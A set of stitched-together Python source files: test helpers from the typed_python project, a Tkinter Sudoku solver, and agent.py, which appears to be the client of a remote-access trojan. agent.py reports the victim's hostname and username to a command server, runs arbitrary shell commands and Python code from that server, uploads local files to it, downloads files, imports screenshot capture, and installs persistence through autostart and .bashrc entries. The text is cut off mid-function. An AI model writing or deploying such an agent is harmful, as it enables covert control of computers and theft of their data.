the result of the expression.
"""
with tempfile.TemporaryDirectory() as tf:
env = dict(os.environ)
if compilerCacheDir:
env["TP_COMPILER_CACHE"] = compilerCacheDir
sc = SerializationContext()
with open(os.path.join(tf, "input"), "wb") as f:
f.write(sc.serialize((func, argTup)))
try:
subprocess.check_output(
[
sys.executable,
"-u",
"-c",
"from typed_python import SerializationContext\n"
"sc = SerializationContext()\n"
"with open('input', 'rb') as f:\n"
" func, argTup = sc.deserialize(f.read())\n"
"with open('output', 'wb') as f:\n"
" f.write(sc.serialize(func(*argTup)))\n"
],
cwd=tf,
env=env,
stderr=subprocess.PIPE
)
except subprocess.CalledProcessError as e:
raise Exception("Subprocess failed:\n\n" + e.stdout.decode("ASCII") + "\n\nerr=\n" + e.stderr.decode("ASCII"))
with open(os.path.join(tf, "output"), "rb") as f:
result = sc.deserialize(f.read())
return result
def evaluateExprInFreshProcess(filesToWrite, expression, compilerCacheDir=None, printComments=False):
"""Return the value of an expression evaluated in a subprocess.
We use this to test using typed_python in codebases other than the main
typed_python codebase, so that we can see what happens when some code itself
changes underneath us.
The value of the expression must be picklable, and shouldn't depend on
any of the code in 'filesToWrite', since it won't make sense in the calling
module.
Args:
filesToWrite = a dictionary from filename to the actual file contents to write.
expression - the expression to evaluate. You should assume that we've imported
all the modules given in 'filesToWrite', as well as everything
from typed_python.
Returns:
the result of the expression.
Example:
evaluateExprInFreshProcess({'M.py': "x = 10"}, "M.x")
"""
with tempfile.TemporaryDirectory() as tf:
instantiateFiles(filesToWrite, tf)
namesToImport = [
fname[:-3].replace("/", ".") for fname in filesToWrite if '__init__' not in fname
]
env = dict(os.environ)
if compilerCacheDir:
env["TP_COMPILER_CACHE"] = compilerCacheDir
try:
output = subprocess.check_output(
[
sys.executable,
"-u",
"-c",
"".join(f"import {modname};" for modname in namesToImport) + (
f"import pickle;"
f"from typed_python._types import identityHash, recursiveTypeGroup;"
f"from typed_python import *;"
f"print(repr(pickle.dumps({expression})))"
)
],
cwd=tf,
env=env,
stderr=subprocess.PIPE
)
except subprocess.CalledProcessError as e:
raise Exception("Subprocess failed:\n\n" + e.stdout.decode("ASCII") + "\n\nerr=\n" + e.stderr.decode("ASCII"))
def isBytes(x):
return x.startswith(b"b'") or x.startswith(b'b"')
comments = [x for x in output.split(b"\n") if not isBytes(x) and x]
result = b'\n'.join([x for x in output.split(b"\n") if isBytes(x)])
if comments and printComments:
print("GOT COMMENTS:\n", "\n".join(["\t" + x.decode("ASCII") for x in comments]))
try:
# we're returning a 'repr' of a bytes object. the 'eval'
# turns it back into a python bytes object so we can compare it.
return pickle.loads(eval(result))
except Exception:
raise Exception("Failed to understand output:\n" + output.decode("ASCII"))
|
main.pyw
|
'''Sudoku Solver Main Module'''
import tkinter
from tkinter import ttk # Used for scrollbar
from tkinter import messagebox # Used for message boxes
from tkinter import filedialog # Used for opening the file dialog box
import copy # Used for creating copies of variables instead of instances
import threading # Multithreading module
import time # Time module for delays
import os # Module for opening system files
from sys import exit # Prevents .exe from crashing when exit function is used
import json # Module for opening json files
class GraphicalInterface:
'Creates the entire GUI'
def __init__(self, parent): # Parent is the main window
self.parent = parent # Parent root frame
self.solutions = [] # Stores all solved grids
self.empty_grid = [ # Empty grid used for resetting
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
]
self.running = False # Sets the flag indicating whether the solver thread is running; needed for solver thread
self.modify = True # Sets the flag indicating whether the grid is allowed to be modified
self.autosave = tkinter.IntVar() # Sets value indicating whether to save grid automatically (1 or 0)
self.delay = tkinter.IntVar() # Sets value indicating whether to delay grid animation (1 or 0)
self.margin = 10 # Margin size of the sudoku board
self.side = 40 # Side length of each square in the grid
self.width = self.height = (self.margin*2) + (self.side*9) # Defines the width and height of the canvas
self.buttonfont = ('Helvetica', 7) # Font type of buttons
self.statusfont = ('Helvetica', 7) # Font type for the status bar
self.gridfont = ('Helvetica', 10, 'bold') # Font type of sudoku grid
self.row = None # Currently selected cell row and column
self.col = None
self.__widgets() # Initiates other widgets
self.__load_settings() # Loads old settings
### PACKING WIDGETS
def __widgets(self):
'Initiates the widgets'
### MENUBAR
self.menubar = tkinter.Menu(root) # Creates the menubar object
root.config(menu=self.menubar) # Sets menubar object in root
self.file_submenu = tkinter.Menu(self.menubar, tearoff=0) # Creates file submenu
self.menubar.add_cascade(label='File', menu=self.file_submenu) # Places submenu inside menubar
self.file_submenu.add_command(label='Load...', command=self.__load) # Adds load button
self.file_submenu.add_separator() # Adds a line separator
self.file_submenu.add_command(label='Save As...', state=tkinter.DISABLED, command=self.__save) # Adds save button which is disabled at the start
self.file_submenu.add_checkbutton(label='Auto Save', variable=self.autosave, command=self.__save_settings) # Adds a checkbutton for autosave functionality binded to self.autosave
self.file_submenu.add_separator() # Adds a line separator
self.file_submenu.add_command(label='Exit', command=exit) # Adds exit button
self.option_submenu = tkinter.Menu(self.menubar, tearoff=0) # Creates options submenu
self.menubar.add_cascade(label='Options', menu=self.option_submenu) # Places the submenu inside the menubar
self.option_submenu.add_checkbutton(label='Delay Animations', variable=self.delay, command=self.__save_settings) # Adds a checkbutton for delaying animations functionality binded to self.delay
self.help_submenu = tkinter.Menu(self.menubar, tearoff=0) # Creates help submenu
self.menubar.add_cascade(label='Help', menu=self.help_submenu) # Places the submenu inside the menubar
self.help_submenu.add_command(label='About Sudoku Solver', command=self.__about) # About button that opens README.md
self.help_submenu.add_separator() # Adds a line separator
self.help_submenu.add_command(label='Licence', command=self.__licence) # Licence button that opens LICENCE.md
### SCROLLBAR & STATUS BAR
self.scrollbar = tkinter.Scrollbar(root) # Scrollbar for the text widget
self.scrollbar.grid(row=0, column=2, sticky=tkinter.NS) # sticky parameter makes scrollbar stretch from top to bottom; added on right side of GUI
self.status_bar = tkinter.Label(root, text='Awaiting commands.', font=self.statusfont, bg='#171717', fg='white', anchor=tkinter.E) # Status bar for displaying various status updates
self.status_bar.grid(row=1, column=0, columnspan=3, sticky=tkinter.EW) # sticky parameter makes the label stretch from left to right; added at the bottom of the GUI
### LEFT FRAME (Contains Sudoku Grid)
self.left_frame = tkinter.Frame(self.parent, bg='#212121') # Left frame placed inside the root widget
self.canvas = tkinter.Canvas(self.left_frame, bg='#212121', width=self.width, height=self.height) # Sudoku grid canvas
self.left_frame.grid(row=0, column=0) # Positions the frame on the left of the GUI
self.canvas.grid(padx=(10,0))
### RIGHT FRAME (Contains solutions display grid and execution buttons)
self.right_frame = tkinter.Frame(self.parent, bg='#212121') # Right frame placed inside the root widget
self.solved_grids_display = tkinter.Text(self.right_frame, bg='#212121', height=21, width=30, state=tkinter.DISABLED, yscrollcommand=self.scrollbar.set) # Text widget displaying all the solved solutions
self.right_frame.grid(row=0, column=1) # Positions the frame on the right of the GUI
self.solved_grids_display.grid(row=0, column=0, padx=10, pady=(20,0))
###### RIGHT FRAME BUTTONS LABEL FRAME (Contains execution buttons)
self.buttons_label_frame = tkinter.LabelFrame(self.right_frame, text='Configure', font=self.statusfont, bg='#212121', fg='white') # Buttons sub frame inside right frame
self.start_btn = tkinter.Button(self.buttons_label_frame, text='Start', font=self.buttonfont, bg='#212121', fg='white', command=self.__start) # Start button
self.stop_btn = tkinter.Button(self.buttons_label_frame, text='Stop', font=self.buttonfont, bg='#212121', fg='white', state=tkinter.DISABLED, command=self.__stop) # Stop button
self.reset_btn = tkinter.Button(self.buttons_label_frame, text='Reset', font=self.buttonfont, bg='#212121', fg='white', state=tkinter.DISABLED, command=self.__reset) # Reset button
self.loading_bar = ttk.Progressbar(self.buttons_label_frame, orient=tkinter.HORIZONTAL, mode='indeterminate', maximum='20', length=150) # Indeterminate loading bar does not fill gradually but rather sweeps across
self.buttons_label_frame.grid(row=1, column=0, columnspan=2, pady=(0,10)) # Places label frame inside the right frame
self.start_btn.grid(row=1, column=0)
self.stop_btn.grid(row=1, column=1)
self.reset_btn.grid(row=1, column=2)
self.loading_bar.grid(row=1, column=3, sticky=tkinter.EW) # sticky parameter makes loading bar stretch from left to right
### WIDGET CONFIGURATION
self.scrollbar.config(command=self.solved_grids_display.yview) # Configures the scrolling of the text widget
self.solved_grids_display.tag_configure('header', font=('Helvetica', 10, 'bold'), foreground='#FC5F17', justify=tkinter.CENTER) # Configures the header font properties of the text widget
self.solved_grids_display.tag_configure('subheader', font=('Helvetica', 7, 'bold italic'), foreground='#FC5F17', justify=tkinter.CENTER) # Configures the subheader font properties of the text widget
self.solved_grids_display.tag_configure('solutions', font=('Helvetica', 14, 'bold'), foreground='#FC5F17', justify=tkinter.CENTER) # Configures the solution grids font properties of the text widget
### BINDING MOUSE AND KEYBOARD EVENTS
self.__draw_grid() # Draws the empty grid
self.canvas.bind('<Button-1>', self.__cell_clicked) # Binds left click to selecting a cell
self.parent.bind('<Key>', self.__key_pressed) # Binds key pressed to entering a key; must be binded to root
def __draw_grid(self):
'Draws the Sudoku grid'
for i in range(10):
if i % 3 == 0: # Every 3 lines switches to black
color = 'white'
else:
color = 'grey'
# Vertical lines
x0 = self.margin + (i*self.side)
y0 = self.margin
x1 = self.margin + (i*self.side)
y1 = self.height - self.margin
self.canvas.create_line(x0,y0,x1,y1, fill=color)
# Horizontal lines
x0 = self.margin
y0 = self.margin + (i*self.side)
x1 = self.height - self.margin
y1 = self.margin + (i*self.side)
self.canvas.create_line(x0,y0,x1,y1, fill=color)
### MOUSE AND KEYBOARD INPUT HANDLING
def __cell_clicked(self, event):
'''Handles mouse clicks
Takes event as argument. Creates indicator only if self.modify is True'''
x, y = event.x, event.y # Finds the x and y coordinate of the click
if self.modify: # Box selection functionality only available if modify variable is True
if (self.margin < x < self.width - self.margin) and (self.margin < y < self.height - self.margin): # Checks that the click is inside the grid
row, col = (y-self.margin)//self.side, (x-self.margin)//self.side # Calculates what row and column the cursor is in
if (row, col) == (self.row, self.col): # If cell is already selected, deselect it
self.row, self.col = None, None
else: # If it is not selected, select it
self.row, self.col = row, col
self.__draw_border() # Handles the box selection
else: # If the user clicks outside the canvas
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
def __draw_border(self):
'Draws the border around the selected square'
self.canvas.delete('cursor') # Deletes the previous cursor
if (self.row, self.col) != (None, None): # Checks that a box has not been deselected
x0 = self.margin + self.col*self.side # Defines the boundaries of the rectangle selection cursor
y0 = self.margin + self.row*self.side
x1 = self.margin + (self.col+1)*self.side
y1 = self.margin + (self.row+1)*self.side
self.canvas.create_rectangle(x0, y0, x1, y1, tags='cursor', outline='#03DAC6', width=2) # Creates the cursor
def __key_pressed(self, event):
'''Handles keyboard key press
Takes event as argument'''
if event.keysym == 'Return': # Return button used to start dynamic solving of the grid
if self.start_btn.cget('state') == 'normal': # Start button is enabled (program is ok to run)
self.__start() # Starts program execution
elif event.keysym == 'Escape': # Escape button used to stop the dynamic solving of the grid
if self.stop_btn.cget('state') == 'normal': # Stop button is enabled (program is ok to stop)
self.__stop() # Stops program execution
elif (self.row, self.col) != (None, None): # Checks that a square is selected
if event.char.isnumeric(): # If entered key is a digit
self.__display_number(self.row, self.col, event.char, color='#FC5F17') # Displays digit in canvas
self.reset_btn.config(state=tkinter.NORMAL) # Enables the reset button
if self.col == 8: # If selected cell is in the last column
if self.row != 8: # If the selected cell is not in the last row
self.row, self.col = self.row+1, 0 # Selects first cell of next row
else: # If selected cell is not in the last column
self.col += 1 # Selects next cell across
self.__draw_border()
elif event.keysym == 'BackSpace': # If backspace is pressed
self.__display_number(self.row, self.col, None) # Resets the square
### START/STOP/RESET METHODS
def __start(self):
'Begins the dynamic solving of the grid'
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
self.grid = [ # Makes a new empty 8x8 grid which will store the user-entered values
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
]
# Stores each user-entered number in self.grid
for ypos, row in enumerate(self.grid): # Goes through each row in the grid
for xpos, _ in enumerate(row): # Goes through each position in the row
grid_object = self.canvas.find_withtag((ypos,xpos),) # Gets the grid number object with tag at respective position (row, column)
value = self.canvas.itemcget(grid_object, 'text') # Gets the value of the specific grid number; 'text' argument specifies we want to extract the text
# Note that value could be None
if value: # If the cell is filled in
self.grid[ypos][xpos] = int(value)
else: # If the cell is empty
self.grid[ypos][xpos] = 0
if not self.__validate_selected_grid(): # If the grid is not valid in format
return None # Returns early
else: # Grid is valid in format; GRID MAY NOT HAVE ANY SOLUTIONS
self.__update_grid(self.grid) # Displays the grid
threading.Thread(target=self.__solver_thread).start() # Initiates the solver thread
def __solver_thread(self):
'Main solver thread that solves self.grid'
self.running = True # Allows the solver thread to run
self.modify = False # Grid modification feature must be disabled when grid is solving
self.file_submenu.entryconfig(0, state=tkinter.DISABLED) # Disables the load functionality when program is running
self.file_submenu.entryconfig(2, state=tkinter.DISABLED) # Disables the save as functionality when program is running
self.option_submenu.entryconfig(0, state=tkinter.DISABLED) # Disables animations delay setting
self.start_btn.config(state=tkinter.DISABLED) # Disabled start button until execution is finished
self.stop_btn.config(state=tkinter.NORMAL) # Enables the stop button until execution is finished
self.reset_btn.config(state=tkinter.DISABLED) # Disables the reset button until execution is finished
self.status_bar.config(text='Executing solve.', fg='white') # Updates status bar
self.loading_bar.start() # Starts the loading bar animation
self.interrupted = self.__solve_grid() # Solves the grid and returns True (was interrupted) or False (was not interrupted); used for displaying or auto saving
self.running = False # Program is not running anymore
if self.solutions: # If at least 1 solution has been found
self.file_submenu.entryconfig(2, state=tkinter.NORMAL) # Re-enables the save as functionality
else: # If no solutions have been found
self.__update_solved_grids() # Updates the solved solutions text widget
self.option_submenu.entryconfig(0, state=tkinter.NORMAL) # Enables animations delay setting
self.stop_btn.config(state=tkinter.DISABLED) # Disables stop button at the end of execution
self.reset_btn.config(state=tkinter.NORMAL) # Enables the reset button
self.loading_bar.stop() # Stops the loading bar animation
if not self.interrupted: # Displays all solutions only if it was not interrupted
self.status_bar.config(text='Execution successful. Please reset grid.', fg='white') # Updates status bar
if self.autosave.get() and self.solutions: # If autosave is on and at least 1 solution has been found
self.__save() # Save the results
else: # If program was interrupted
self.status_bar.config(text='Execution interrupted. Please reset grid.', fg='white') # Updates status bar
def __stop(self):
'Interrupts the dynamic solving of the grid'
self.running = False # Disallowes the solver thread from running
def __reset(self):
'Resets the graphical user interface to its initial state'
self.file_submenu.entryconfig(0, state=tkinter.NORMAL) # Enables the load functionality when program is reset
self.file_submenu.entryconfig(2, state=tkinter.DISABLED) # Disables the save as functionality when program is reset
self.start_btn.config(state=tkinter.NORMAL) # Re-enables the start button
self.reset_btn.config(state=tkinter.DISABLED) # Disables the reset ability
self.solutions = [] # Resets all the found solutions
self.loaded_grid = None # Forgets the loaded grid
self.modify = True # Re-enables the modify flag to enable grid modification
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
self.solved_grids_display.config(state=tkinter.NORMAL) # Temporarily enables widget
self.solved_grids_display.delete(1.0, 'end') # Clears the entire solved solutions text widget
self.solved_grids_display.config(state=tkinter.DISABLED) # Disables widget again
self.__update_grid(self.empty_grid) # Displays the empty grid
self.status_bar.config(text='Reset complete.', fg='white') # Updates the status bar
### LOGIC HANDLING METHODS
def __solve_grid(self):
'''Solves the grid in self.grid and stores each solution as a list in self.solutions; displays each iteration of the solving algorithm
Returns True if process was interrupted or False if process was not interrupted'''
for ypos, row in enumerate(self.grid): # Goes through each row in the grid
for xpos, position in enumerate(row): # Goes through each position in the row
if position == 0: # Position must be empty
for num in range(1,10): # Tries all numbers from 1 to 9
if self.delay.get(): # If animation is set to be delayed
time.sleep(0.1)
if not self.running: # If it was interrupted
return True # Returns True; it was interrupted
if self.__possible(xpos, ypos, num): # Check if the number is a possible
self.grid[ypos][xpos] = num # Puts possible number in empty space
self.__display_number(ypos, xpos, num)
self.__solve_grid() # Keeps solving
self.grid[ypos][xpos] = 0 # If program reaches here, no further numbers can be put into the grid and the square is reset
self.__display_number(ypos, xpos, None) # Empties the sudoku square
return False # No possible solution has been found for an empty position; Exits function by returning None as it was not interrupted
# If program reaches this point, there are no more empty spaces in the grid and a solution has been found
deepcopy_grid = copy.deepcopy(self.grid) # A copy of the original grid is made
self.solutions.append(deepcopy_grid) # Solution added to list of solutions
self.__update_solved_grids() # Updates the solved solutions text widget
def __possible(self, x, y, n):
'''Returns True or False if a number can fit in a specific position in self.grid
Takes x position, y position, and value of a possible number as arguments'''
# Checks row
for position in self.grid[y]:
if position == n:
return False
# Checks column
for row in self.grid:
if row[x] == n:
return False
# Checks square
ranges = [range(0,3), range(3,6), range(6,9)] # Possible grid ranges
xrange = None # Stores the ranges that x and y are in
yrange = None
for possible_range in ranges:
if x in possible_range:
xrange = possible_range # If x fits in the range, the range is stored
if y in possible_range:
yrange = possible_range # If y fits in the range, the range is stored
for row in self.grid[yrange[0]:yrange[-1]+1]:
for position in row[xrange[0]:xrange[-1]+1]:
if position == n: # Checks every position in the square
return False
return True # No doubles detected
### VALIDATION METHODS
def __validate_selected_grid(self):
'Validates self.grid by making sure the value placement is correct and that at least 17 values have been entered; returns True or False if grid is valid'
count = 0 # Stores the valid grid clue count
for ypos, row in enumerate(self.grid): # Goes through each row in the grid
for xpos, position in enumerate(row): # Goes through each position in the row
if position: # If the number is not 0
self.grid[ypos][xpos] = 0 # Sets the number to 0 temporarily so that self.__possible works
if not self.__possible(xpos, ypos, position): # If number cannot be placed in that position
# Note that number is not reset in the grid if it is invalid. Grid must be reset
self.status_bar.config(text=f'Conflict in clue positioning (Row:{ypos+1},Column:{xpos+1}). Invalid grid.', fg='#CF6679') # Updates status bar with dark red color
return False # Grid is invalid
self.grid[ypos][xpos] = position # Resets number in the grid after using __possible method
count += 1 # Number is valid
if count < 17: # If there are less than 17 clues
self.status_bar.config(text=f'Please enter at least 17 clues. ({17-count} remaining)', fg='#CF6679') # Updates status bar with dark red color
return False # Grid is invalid
return True # Grid is valid
def __validate_loaded_grid(self, grid): # Used for validating an imported grid
'''Validates the format of a LOADED grid by making sure only integer values between 0 to 9 are entered and that grid is of list type; returns True or False if grid format is valid
Takes grid as argument'''
if not isinstance(grid, list): # Checks that the grid is of type grid
return False # Grid is not valid
for row in grid: # For each row in the grid
if len(row) != 9: # If exactly 9 items are not present in each row
return False # Grid is not valid
for position in row: # For each number in the grid
if position not in range(0, 10): # Number must be in range [0,10)
return False # Grid is invalid
return True # Grid is valid
### DISPLAYER METHODS
def __update_grid(self, grid):
'''Displays a grid in the Sudoku canvas
Takes grid as argument'''
for ypos, row in enumerate(grid): # Goes through each row in the grid
for xpos, position in enumerate(row): # Goes through each position in the row
if position: # If the number does not equal to 0
self.__display_number(ypos, xpos, position, color='#FC5F17') # Displays the number
else: # If the number is 0, square is supposed to be empty
self.__display_number(ypos, xpos, None) # Empties square
def __update_solved_grids(self):
'Updates solved grids text widget by displaying all the found solutions from self.solutions'
self.solved_grids_display.config(state=tkinter.NORMAL) # Temporarily activates the text widget
self.solved_grids_display.delete(1.0, 'end') # Clears entire widget
self.solved_grids_display.insert('end', f'{len(self.solutions)} Solution(s) Found\n', 'header') # Adds header with header tag
if len(self.solutions) == 1: # If only 1 solution has been found
self.solved_grids_display.insert('end', f'(True Sudoku Grid)\n', 'subheader') # True Sudoku grid by definition
else: # If more than 1 solutions are found
self.solved_grids_display.insert('end', f'(False Sudoku Grid)\n', 'subheader') # False Sudoku grid by definition
for grid in self.solutions: # For each solution
self.solved_grids_display.insert('end', '\n') # Adds a separator between the solutions
for row in grid: # For each row in the solution grid
self.solved_grids_display.insert('end', f'{row}\n', 'solutions') # Appends the row to the text widget with solutions tag
self.solved_grids_display.see('end') # Automatically scrolls to the end of the widget
self.solved_grids_display.config(state=tkinter.DISABLED) # Deactivates the text widget
def __display_number(self, row, column, n, color='white'):
'''Displays a given digit on the Sudoku canvas
Takes the row number, column number, value of the number to display, and optional font color as arguments'''
x = round(self.margin + self.side*column + self.side/2) # Finds x and y coords of the centre of the selected square
y = round(self.margin + self.side*row + self.side/2) # Coordinates are rounded to nearest integer
tag = (row,column) # Create a tag from 00 to 88 representing the row and column the selected square is in
self.canvas.delete(tag) # Deletes previous
self.canvas.create_text(x, y, text=n, tags=(tag,), fill=color, font=self.gridfont) # Places a number on the screen with tagged position
# tags argument should be a tuple or string
def __solutions_formatter(self):
'''Manipulates the solutions in self.solutions into a printable format
Returns formatted string'''
formatted = f'-----------------------{len(self.solutions)} Solutions Found-----------------------\n' # String storing formatted solutions
if len(self.solutions) == 1: # If only 1 solution has been found
formatted += f'(True Sudoku Grid)' # True Sudoku grid by definition
else: # If more than 1 solutions are found
formatted += f'(False Sudoku Grid)' # True Sudoku grid by definition
for grid in self.solutions: # For each solution
formatted += '\n' # Adds empty line between each solution
for row in grid: # For each row in the grid
formatted += f'\n{row}'
return formatted # Returns formatted solutions as a string
### MENUBAR SETTINGS METHODS
def __load(self):
'Loads a grid from a chosen json file'
try:
filename = filedialog.askopenfilename(title='Select Load File', filetypes=(('Text Files', '*.json'),)) # Prompts user to select a load file (.json)
if filename: # If a file has been chosen
with open(filename, 'r') as f: # Opens the chosen file as read
loaded_grid = json.load(f) # Deserialize json file contents
if self.__validate_loaded_grid(loaded_grid): # If the grid is of valid format
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
self.reset_btn.config(state=tkinter.NORMAL) # Enabled reset button
self.__update_grid(loaded_grid) # Displays the grid
else: # If grid is invalid
raise Exception('Incorrect grid format') # Raises exception
else: # If program reaches this point, user has not chosen a file and has aborted load
return None
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
self.status_bar.config(text=f'An error occurred. Load aborted.', fg='#CF6689') # Updates status bar
else:
messagebox.showinfo(title='File loaded successfully', message=f"Grid has been successfully loaded from '{filename}'") # Shows successful load info
self.status_bar.config(text=f'Load successful.', fg='white') # Updates status bar
def __save(self):
'Saves all found solutions in chosen text file'
try:
filename = filedialog.askopenfilename(title='Select Save File', filetypes=(('Text Files', '*.txt'),)) # Prompts user to select a save file (.txt)
if filename: # If a file has been chosen
with open(filename, 'w') as f: # Opens the chosen file
f.write(self.__solutions_formatter()) # Writes solutions into file
else: # If program reaches this point, user has not chosen a file and has aborted save
return None
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
self.status_bar.config(text=f'An error occurred. Save aborted.', fg='#CF6689') # Updates status bar
else:
messagebox.showinfo(title='File saved successfully', message=f"Solutions have been successfully saved in '{filename}'") # Shows successful save info
self.status_bar.config(text=f'Save successful.', fg='white') # Updates status bar
def __save_settings(self):
'Updates settings in settings.json'
try:
with open(r'resources\settings.json', 'w') as f: # Opens the chosen file as read
self.settings = {'Autosave': self.autosave.get(), 'AnimationDelay': self.delay.get()} # Stores all the loadable settings as a dictionary
json.dump(self.settings, f) # Dumps the settings into json file
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
exit() # Exits program if an error occurs when saving
def __load_settings(self):
'Loads the settings from settings.json'
try:
with open(r'resources\settings.json', 'r') as f: # Opens the chosen file as read
self.settings = json.load(f) # Loads all the settings
self.autosave.set(self.settings['Autosave'])
self.delay.set(self.settings['AnimationDelay'])
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
exit() # Exits program if settings are not found
def __about(self):
'Opens README.md'
if os.path.isfile(r'README.md'): # If file has not been deleted
os.system(r'README.md') # Opens README.md with an adequate program like notepad
else: # If file has been deleted or cannot be found
messagebox.showerror(title='Fatal Error', message=f"File 'README.MD' not found.") # Shows error
def __licence(self):
'Opens the LICENCE.md'
if os.path.isfile(r'LICENCE.md'): # If file has not been deleted
os.system(r'LICENCE.md') # Opens README.md with an adequate program like notepad
else: # If file has been deleted or cannot be found
messagebox.showerror(title='Fatal Error', message=f"File 'LICENCE.MD' not found.") # Shows error
root = tkinter.Tk() # Defines the main window
root.title('Sudoku Solver') # Sets the title of the window
root.iconbitmap(r'resources\sudoku_icon.ico') # Sets the icon for the window
root.resizable('False', 'False') # Disables resizing
root.config(bg='#212121')
GraphicalInterface(root) # GUI instance is created
root.mainloop()
|
agent.py
|
#!/usr/bin/env python2
# coding: utf-8
import requests
import time
import os
import subprocess
import platform
import shutil
import sys
import traceback
import threading
import uuid
import StringIO
import zipfile
import tempfile
import socket
import getpass
if os.name == 'nt':
from PIL import ImageGrab
else:
import pyscreenshot as ImageGrab
import config
def threaded(func):
def wrapper(*_args, **kwargs):
t = threading.Thread(target=func, args=_args)
t.start()
return
return wrapper
class Agent(object):
def __init__(self):
self.idle = True
self.silent = False
self.platform = platform.system() + " " + platform.release()
self.last_active = time.time()
self.failed_connections = 0
self.uid = self.get_UID()
self.hostname = socket.gethostname()
self.username = getpass.getuser()
def get_install_dir(self):
install_dir = None
if platform.system() == 'Linux':
install_dir = self.expand_path('~/.ares')
elif platform.system() == 'Windows':
install_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if os.path.exists(install_dir):
return install_dir
else:
return None
def is_installed(self):
return self.get_install_dir()
def get_consecutive_failed_connections(self):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
if os.path.exists(check_file):
with open(check_file, "r") as f:
return int(f.read())
else:
return 0
else:
return self.failed_connections
def update_consecutive_failed_connections(self, value):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
with open(check_file, "w") as f:
f.write(str(value))
else:
self.failed_connections = value
def log(self, to_log):
""" Write data to agent log """
print(to_log)
def get_UID(self):
""" Returns a unique ID for the agent """
return getpass.getuser() + "_" + str(uuid.getnode())
def server_hello(self):
""" Ask server for instructions """
req = requests.post(config.SERVER + '/api/' + self.uid + '/hello',
json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username})
return req.text
def send_output(self, output, newlines=True):
""" Send console output to server """
if self.silent:
self.log(output)
return
if not output:
return
if newlines:
output += "\n\n"
req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
data={'output': output})
def expand_path(self, path):
""" Expand environment variables and metacharacters in a path """
return os.path.expandvars(os.path.expanduser(path))
@threaded
def runcmd(self, cmd):
""" Runs a shell command and returns its output """
try:
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
output = (out + err)
self.send_output(output)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def python(self, command_or_file):
""" Runs a python command or a python file and returns the output """
new_stdout = StringIO.StringIO()
old_stdout = sys.stdout
sys.stdout = new_stdout
new_stderr = StringIO.StringIO()
old_stderr = sys.stderr
sys.stderr = new_stderr
if os.path.exists(command_or_file):
self.send_output("[*] Running python file...")
with open(command_or_file, 'r') as f:
python_code = f.read()
try:
exec(python_code)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
self.send_output("[*] Running python command...")
try:
exec(command_or_file)
except Exception as exc:
self.send_output(traceback.format_exc())
sys.stdout = old_stdout
sys.stderr = old_stderr
self.send_output(new_stdout.getvalue() + new_stderr.getvalue())
def cd(self, directory):
""" Change current directory """
os.chdir(self.expand_path(directory))
@threaded
def upload(self, file):
""" Uploads a local file to the server """
file = self.expand_path(file)
try:
if os.path.exists(file) and os.path.isfile(file):
self.send_output("[*] Uploading %s..." % file)
requests.post(config.SERVER + '/api/' + self.uid + '/upload',
files={'uploaded': open(file, 'rb')})
else:
self.send_output('[!] No such file: ' + file)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def download(self, file, destination=''):
""" Downloads a file the the agent host through HTTP(S) """
try:
destination = self.expand_path(destination)
if not destination:
destination= file.split('/')[-1]
self.send_output("[*] Downloading %s..." % file)
req = requests.get(file, stream=True)
with open(destination, 'wb') as f:
for chunk in req.iter_content(chunk_size=8000):
if chunk:
f.write(chunk)
self.send_output("[+] File downloaded: " + destination)
except Exception as exc:
self.send_output(traceback.format_exc())
def persist(self):
""" Installs the agent """
if not getattr(sys, 'frozen', False):
self.send_output('[!] Persistence only supported on compiled agents.')
return
if self.is_installed():
self.send_output('[!] Agent seems to be already installed.')
return
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
os.system('chmod +x ' + agent_path)
if os.path.exists(self.expand_path("~/.config/autostart/")):
desktop_entry = "[Desktop Entry]\nVersion=1.0\nType=Application\nName=Ares\nExec=%s\n" % agent_path
with open(self.expand_path('~/.config/autostart/ares.desktop'), 'w') as f:
f.write(desktop_entry)
else:
with open(self.expand_path("~/.bashrc"), "a") as f:
